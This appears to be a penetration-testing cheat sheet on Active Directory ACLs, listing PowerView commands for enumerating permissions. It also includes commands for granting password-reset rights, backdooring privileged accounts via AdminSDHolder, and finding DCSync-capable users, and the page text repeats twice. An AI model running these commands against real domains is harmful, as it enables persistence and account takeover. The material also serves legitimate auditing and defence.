ACLs

General

Access Control Entries (ACE) correspond to individual permission or audits access
Who has permission and what can be done on an object?
Two types:
- DACL -> Defines the permissions trustees (a user or group) have on an object
- SACL - Logs success and failure audit messages when an object is accessed

Enumerate ACLs without Resolving GUIDs

# AD Module
(Get-ACL 'CN=Domain Admins,CN=Users,DC=dc01,DC=dc02,DC=local').Access

Get the ACLs Associated with the Specified Object

# PowerView
Get-ObjectACL -SamAccountName "Users" -ResolveGUIDs

Get the ACLs Associated with the Specified Prefix to Be Used for Search

# PowerView
Get-ObjectACL -ADSPrefix 'CN=Administrator,CN=Users' -Verbose

Get the ACLs Associated with the Specified LDAP Path to Be Used for Search

# PowerView
Get-ObjectACL -ADSPath "LDAP://CN=Domain Admins,CN=Users,DC=dc01,DC=dc02,DC=local" -ResolveGUIDs -Verbose

Search for Interesting ACEs

# PowerView
Invoke-ACLScanner -ResolveGUIDs

Get the ACLs Associated with the Specified Path

# PowerView
Get-PathACL -Path "\\dc01.lab.local\sysvol"

Enumerate Who Has Rights to the 'matt' User in 'testlab.local', Resolving Rights GUIDs to Names

# PowerView
Get-DomainObjectAcl -Identity matt -ResolveGUIDs -Domain testlab.local

Grant User 'will' the Rights to Change 'matt's Password

# PowerView
Add-DomainObjectAcl -TargetIdentity matt -PrincipalIdentity will -Rights ResetPassword -Verbose

Audit the Permissions of AdminSDHolder, Resolving GUIDs

# PowerView
Get-DomainObjectAcl -SearchBase 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -ResolveGUIDs

Backdoor the ACLs of All Privileged Accounts with the 'matt' Account through AdminSDHolder Abuse

# PowerView
Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -PrincipalIdentity matt -Rights All

Retrieve most Users Who Can Perform DC Replication for dev.testlab.local (i.e. DCsync)

# PowerView
Get-DomainObjectAcl "dc=dev,dc=testlab,dc=local" -ResolveGUIDs | ? {
    ($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')
}

Enumerate Permissions for GPOs where Users with RIDs of > -1000 Have Some Kind of Modification/Control Rights

# PowerView
Get-DomainObjectAcl -LDAPFilter '(objectCategory=groupPolicyContainer)' | ? { ($_.SecurityIdentifier -match '^S-1-5-.*-[1-9]\d{3,}$') -and ($_.ActiveDirectoryRights -match 'WriteProperty|GenericAll|GenericWrite|WriteDacl|WriteOwner')}

PreviousGPOs NextDomains

Last updated 2 years ago

ACLs

General

Access Control Entries (ACE) correspond to individual permission or audits access
Who has permission and what can be done on an object?
Two types:
- DACL -> Defines the permissions trustees (a user or group) have on an object
- SACL - Logs success and failure audit messages when an object is accessed

Enumerate ACLs without Resolving GUIDs

# AD Module
(Get-ACL 'CN=Domain Admins,CN=Users,DC=dc01,DC=dc02,DC=local').Access

Get the ACLs Associated with the Specified Object

# PowerView
Get-ObjectACL -SamAccountName "Users" -ResolveGUIDs

Get the ACLs Associated with the Specified Prefix to Be Used for Search

# PowerView
Get-ObjectACL -ADSPrefix 'CN=Administrator,CN=Users' -Verbose

Get the ACLs Associated with the Specified LDAP Path to Be Used for Search

# PowerView
Get-ObjectACL -ADSPath "LDAP://CN=Domain Admins,CN=Users,DC=dc01,DC=dc02,DC=local" -ResolveGUIDs -Verbose

Search for Interesting ACEs

# PowerView
Invoke-ACLScanner -ResolveGUIDs

Get the ACLs Associated with the Specified Path

# PowerView
Get-PathACL -Path "\\dc01.lab.local\sysvol"

Enumerate Who Has Rights to the 'matt' User in 'testlab.local', Resolving Rights GUIDs to Names

# PowerView
Get-DomainObjectAcl -Identity matt -ResolveGUIDs -Domain testlab.local

Grant User 'will' the Rights to Change 'matt's Password

# PowerView
Add-DomainObjectAcl -TargetIdentity matt -PrincipalIdentity will -Rights ResetPassword -Verbose

Audit the Permissions of AdminSDHolder, Resolving GUIDs

# PowerView
Get-DomainObjectAcl -SearchBase 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -ResolveGUIDs

Backdoor the ACLs of All Privileged Accounts with the 'matt' Account through AdminSDHolder Abuse

# PowerView
Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -PrincipalIdentity matt -Rights All

Retrieve most Users Who Can Perform DC Replication for dev.testlab.local (i.e. DCsync)

# PowerView
Get-DomainObjectAcl "dc=dev,dc=testlab,dc=local" -ResolveGUIDs | ? {
    ($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')
}

Enumerate Permissions for GPOs where Users with RIDs of > -1000 Have Some Kind of Modification/Control Rights

# PowerView
Get-DomainObjectAcl -LDAPFilter '(objectCategory=groupPolicyContainer)' | ? { ($_.SecurityIdentifier -match '^S-1-5-.*-[1-9]\d{3,}$') -and ($_.ActiveDirectoryRights -match 'WriteProperty|GenericAll|GenericWrite|WriteDacl|WriteOwner')}

PreviousGPOs NextDomains

Last updated 2 years ago